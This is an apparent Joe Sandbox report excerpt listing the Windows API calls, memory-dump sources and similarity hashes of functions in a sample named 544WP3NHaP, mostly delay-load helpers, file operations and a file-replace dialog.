                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 5e40ba7a3f1012bccf91928ae73f1c52b2974b0fb1da56c6e3276665fa07fd9e
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 5e40ba7a3f1012bccf91928ae73f1c52b2974b0fb1da56c6e3276665fa07fd9e
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 1ece60658cdb3652f4070f2c4351b488bc21740ca734b0c9b5ab2603126785d3
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 1ece60658cdb3652f4070f2c4351b488bc21740ca734b0c9b5ab2603126785d3
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 73deec9eac19efc88565ae1a561551fa0effdaa5c0ecde85cee33ade7251ef91
                                                                                                                                  • Instruction ID: 9595ba08e526fabdcb5d136df97d56c34852d1f4d4b7f03ca7fd6a4fb7eb7d32
                                                                                                                                  • Opcode Fuzzy Hash: 73deec9eac19efc88565ae1a561551fa0effdaa5c0ecde85cee33ade7251ef91
                                                                                                                                  • Instruction Fuzzy Hash: 9EA011E22A800A3C300822002C02CFB038EE0C0B28330822EF820E03C0AC80280028B3
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 8cff0608e0751a998e366b47efac8190a339b86b3a67528dd4a5d20a2e5e6433
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: 8cff0608e0751a998e366b47efac8190a339b86b3a67528dd4a5d20a2e5e6433
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 830700462031f12da02dbd2ed85a38b347591afd713394caad950d5660b212bf
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: 830700462031f12da02dbd2ed85a38b347591afd713394caad950d5660b212bf
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 49bb209d7d7e4623f3088c79e9513424952001710aeeabd3d7fdfc7fb9c7e6d7
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: 49bb209d7d7e4623f3088c79e9513424952001710aeeabd3d7fdfc7fb9c7e6d7
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: af240b997714103bc164f1d8c7e322f95c39201d755a41a29db259c8d7d78beb
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: af240b997714103bc164f1d8c7e322f95c39201d755a41a29db259c8d7d78beb
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: e9d64a1b7fb0e9172ce113f32dec8a687224d4e6e013892b50b50e869373e5b8
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: e9d64a1b7fb0e9172ce113f32dec8a687224d4e6e013892b50b50e869373e5b8
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • SetEndOfFile.KERNELBASE(?,008A903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 008A9F0C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 749574446-0
                                                                                                                                  APIs
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,008BAE72,C:\Users\user\Desktop,00000000,008E946A,00000006), ref: 008BAC08
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1611563598-0
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,008A95D6,?,?,?,?,?,008D2641,000000FF), ref: 008A963B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 008BC2B1
                                                                                                                                  • EndDialog.USER32(?,00000006), ref: 008BC2C4
                                                                                                                                  • GetDlgItem.USER32(?,0000006C), ref: 008BC2E0
                                                                                                                                  • SetFocus.USER32(00000000), ref: 008BC2E7
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 008BC321
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 008BC358
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008BC36E
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008BC38C
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008BC39C
                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008BC3B8
                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008BC3D4
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC404
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 008BC417
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 008BC41E
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC477
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 008BC48A
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 008BC4A7
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 008BC4C7
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008BC4D7
                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008BC4F1
                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008BC509
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC535
                                                                                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 008BC548
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC59C
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 008BC5AF
                                                                                                                                    • Part of subcall function 008BAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 008BAF35
                                                                                                                                    • Part of subcall function 008BAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008DE72C,?,?), ref: 008BAF84
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                  • API String ID: 797121971-1840816070
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A6FAA
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7013
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7084
                                                                                                                                    • Part of subcall function 008A7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 008A7AAB
                                                                                                                                    • Part of subcall function 008A7A9C: GetLastError.KERNEL32 ref: 008A7AF1
                                                                                                                                    • Part of subcall function 008A7A9C: CloseHandle.KERNEL32(?), ref: 008A7B00
                                                                                                                                    • Part of subcall function 008AA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641,000000FF), ref: 008AA1F1
                                                                                                                                    • Part of subcall function 008AA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641), ref: 008AA21F
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 008A7139
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008A7155
                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008A7298
                                                                                                                                    • Part of subcall function 008A9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008A73BC,?,?,?,00000000), ref: 008A9DBC
                                                                                                                                    • Part of subcall function 008A9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 008A9E70
                                                                                                                                    • Part of subcall function 008A9620: CloseHandle.KERNELBASE(000000FF,?,?,008A95D6,?,?,?,?,?,008D2641,000000FF), ref: 008A963B
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA501
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA532
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
